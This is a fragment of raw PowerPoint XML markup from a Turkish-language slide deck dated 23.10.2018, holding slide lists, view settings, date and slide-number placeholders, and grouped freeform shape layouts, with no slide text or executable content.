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4" r:id="rId5"/>
    <p:sldId id="288" r:id="rId6"/>
    <p:sldId id="289" r:id="rId7"/>
    <p:sldId id="296" r:id="rId8"/>
    <p:sldId id="297" r:id="rId9"/>
    <p:sldId id="298" r:id="rId10"/>
    <p:sldId id="299" r:id="rId11"/>
    <p:sldId id="300" r:id="rId12"/>
    <p:sldId id="304" r:id="rId13"/>
    <p:sldId id="303" r:id="rId14"/>
    <p:sldId id="291" r:id="rId15"/>
    <p:sldId id="316" r:id="rId16"/>
    <p:sldId id="302" r:id="rId17"/>
    <p:sldId id="301" r:id="rId18"/>
    <p:sldId id="256" r:id="rId19"/>
    <p:sldId id="305" r:id="rId20"/>
    <p:sldId id="307" r:id="rId21"/>
    <p:sldId id="308" r:id="rId22"/>
    <p:sldId id="306" r:id="rId23"/>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6437" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="77" d="100"/>
          <a:sy n="77" d="100"/>
        </p:scale>
        <p:origin x="300" y="90"/>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86" d="100"/>
          <a:sy n="86" d="100"/>
        </p:scale>
        <p:origin x="29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A9742C9-2795-48C9-94AA-3767E8243995}" type="datetime1">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>23.10.2018</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lang="tr-TR" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR"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092BEAA-59C0-404A-A46E-CFD28E0665F3}" type="datetime1">
              <a:rPr lang="tr-TR" noProof="0" smtClean="0"/>
              <a:t>23.10.2018</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B667E1-E601-4AAF-B95C-B25720D70A60}" type="slidenum">
              <a:rPr lang="tr-TR" noProof="0" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" noProof="0"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7FB667E1-E601-4AAF-B95C-B25720D70A60}" type="slidenum">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="101025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7FB667E1-E601-4AAF-B95C-B25720D70A60}" type="slidenum">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92200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7FB667E1-E601-4AAF-B95C-B25720D70A60}" type="slidenum">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50571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7FB667E1-E601-4AAF-B95C-B25720D70A60}" type="slidenum">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3880972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7FB667E1-E601-4AAF-B95C-B25720D70A60}" type="slidenum">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350201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up 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="248467">
            <a:off x="223563" y="2575407"/>
            <a:ext cx="4688853" cy="2424835"/>
            <a:chOff x="-10068" y="2615721"/>
            <a:chExt cx="5488038" cy="2838132"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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40" name="Grup 39"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="18988672">
            <a:off x="68557" y="189622"/>
            <a:ext cx="517230" cy="587584"/>
            <a:chOff x="11036616" y="1071278"/>
            <a:chExt cx="1030189" cy="1170315"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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49" name="Serbest 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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50" name="Grup 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11434163" y="6542"/>
            <a:ext cx="679129" cy="712528"/>
            <a:chOff x="11231706" y="127529"/>
            <a:chExt cx="679129" cy="712528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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59" name="Serbest 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0" name="Serbest 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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="61" name="Grup 5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="-1519" y="854145"/>
            <a:ext cx="1881474" cy="2341763"/>
            <a:chOff x="3000" y="1116"/>
            <a:chExt cx="1680" cy="2091"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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81" name="Grup 33"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1714988" y="4544219"/>
            <a:ext cx="1873268" cy="2324202"/>
            <a:chOff x="3359" y="1523"/>
            <a:chExt cx="943" cy="1170"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="82" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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87" name="Grup 43"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1168399" y="5011046"/>
            <a:ext cx="1497013" cy="1857375"/>
            <a:chOff x="3367" y="1523"/>
            <a:chExt cx="943" cy="1170"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="88" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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94" name="Grup 93"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-21971" y="4350236"/>
            <a:ext cx="1696783" cy="2518186"/>
            <a:chOff x="-3496" y="4350236"/>
            <a:chExt cx="1696783" cy="2518186"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="95" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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99" name="Grup 43"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2911336" y="4572470"/>
            <a:ext cx="1850498" cy="2295951"/>
            <a:chOff x="3367" y="1523"/>
            <a:chExt cx="943" cy="1170"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="100" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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106" name="Grup 105"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="1576354">
            <a:off x="11125791" y="2895976"/>
            <a:ext cx="1030189" cy="1170315"/>
            <a:chOff x="11036616" y="1071278"/>
            <a:chExt cx="1030189" cy="1170315"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="107" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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115" name="Serbest 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6" name="Serbest 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nvGrpSpPr>
          <p:cNvPr id="117" name="Grup 116"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="198573">
            <a:off x="1199275" y="2684218"/>
            <a:ext cx="2154692" cy="1686565"/>
            <a:chOff x="1175948" y="2708421"/>
            <a:chExt cx="2159248" cy="1690131"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="118" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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146" name="Grup 5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9167354" y="4138360"/>
            <a:ext cx="3023057" cy="2719639"/>
            <a:chOff x="2887" y="1286"/>
            <a:chExt cx="1903" cy="1712"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="147" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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171" name="Grup 64"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="12827499" flipH="1">
            <a:off x="11360417" y="2338535"/>
            <a:ext cx="483752" cy="536662"/>
            <a:chOff x="2052" y="995"/>
            <a:chExt cx="768" cy="852"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="172" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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2" name="Başlık 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681288" y="165020"/>
            <a:ext cx="9360418" cy="2263258"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="66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3903329" y="2476917"/>
            <a:ext cx="6916336" cy="1771600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">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4071B7F9-EC95-47A0-AD27-99384347F737}" type="datetime1">
              <a:rPr lang="tr-TR" noProof="0" smtClean="0"/>
              <a:t>23.10.2018</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slayt Numarası Yer Tutucusu 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{CA8D9AD5-F248-4919-864A-CFD76CC027D6}" type="slidenum">
              <a:rPr lang="tr-TR" noProof="0" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" noProof="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592666"/>
            <a:ext cx="2628900" cy="5579533"/>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838200" y="592666"/>
            <a:ext cx="7734300" cy="5579533"/>
          </a:xfrm>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5E060A1A-0446-4C1B-AA93-A8EAB91B1FA3}" type="datetime1">
              <a:rPr lang="tr-TR" noProof="0" smtClean="0"/>
              <a:t>23.10.2018</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slayt Numarası Yer Tutucusu 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{CA8D9AD5-F248-4919-864A-CFD76CC027D6}" type="slidenum">
              <a:rPr lang="tr-TR" noProof="0" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" noProof="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6pPr>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr>
              <a:defRPr/>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F3CF5BB6-F328-4688-8B10-1CF89109DA20}" type="datetime1">
              <a:rPr lang="tr-TR" noProof="0" smtClean="0"/>
              <a:t>23.10.2018</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slayt Numarası Yer Tutucusu 5"/>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 name="Başlık 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1523999" y="1485900"/>
            <a:ext cx="9144001" cy="2933700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="5200" b="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22413" y="4454034"/>
            <a:ext cx="9144000" cy="1184766"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"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C4D0ECF9-EA00-45B9-97AD-09405F9E4745}" type="datetime1">
              <a:rPr lang="tr-TR" noProof="0" smtClean="0"/>
              <a:t>23.10.2018</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slayt Numarası Yer Tutucusu 5"/>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28572"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177169"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6291FD1A-E718-4D52-8CE5-FCCAAF0A7371}" type="datetime1">
              <a:rPr lang="tr-TR" noProof="0" smtClean="0"/>
              <a:t>23.10.2018</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" noProof="0"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28572"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4" name="İçerik Yer Tutucusu 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1528572"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177169"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6" name="İçerik Yer Tutucusu 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6177169"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7" name="Tarih Yer Tutucusu 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{DAB7BC1C-27C0-4508-89E9-06144B2BC114}" type="datetime1">
              <a:rPr lang="tr-TR" noProof="0" smtClean="0"/>
              <a:t>23.10.2018</a:t>
            </a:fld>
            <a:endParaRPr lang="tr-TR" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slayt Numarası Yer Tutucusu 8"/>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6" name="Serbest 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 name="Serbest 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 name="Serbest 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nvGrpSpPr>
          <p:cNvPr id="9" name="Grup 69"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="9732236" y="958654"/>
            <a:ext cx="1400819" cy="4001744"/>
            <a:chOff x="3220" y="236"/>
            <a:chExt cx="1347" cy="3848"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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 name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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79" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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93" name="Grup 69"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10895012" y="1248597"/>
            <a:ext cx="1254796" cy="3346122"/>
            <a:chOff x="3124" y="236"/>
            <a:chExt cx="1443" cy="3848"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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09" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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19" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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177" name="Grup 69"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9087454" y="2736976"/>
            <a:ext cx="906206" cy="2416549"/>
            <a:chOff x="3124" y="236"/>
            <a:chExt cx="1443" cy="3848"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="178" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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99" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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09" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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260" name="Grup 50"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10514012" y="2438400"/>
            <a:ext cx="1485016" cy="2195929"/>
            <a:chOff x="3369" y="1563"/>
            <a:chExt cx="940" cy="1390"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="261" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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69" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="274" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="278" name="Serbest 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79" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="285" name="Serbest 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solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="286" name="Serbest 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7" name="Serbest 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8" name="Serbest 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289" name="Grup 5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7988059" y="2988645"/>
            <a:ext cx="2439575" cy="3074765"/>
            <a:chOff x="2968" y="1107"/>
            <a:chExt cx="1736" cy="2188"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="290" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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0" name="Serbest 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1" name="Serbest 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2" name="Serbest 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3" name="Serbest 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4" name="Serbest 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5" name="Serbest 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6" name="Serbest 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7" name="Serbest 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8" name="Serbest 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9" name="Serbest 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310" name="Serbest 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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="311" name="Grup 29"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="9191537" y="4800600"/>
            <a:ext cx="2998875" cy="2083312"/>
            <a:chOff x="2481" y="1188"/>
            <a:chExt cx="2735" cy="1900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
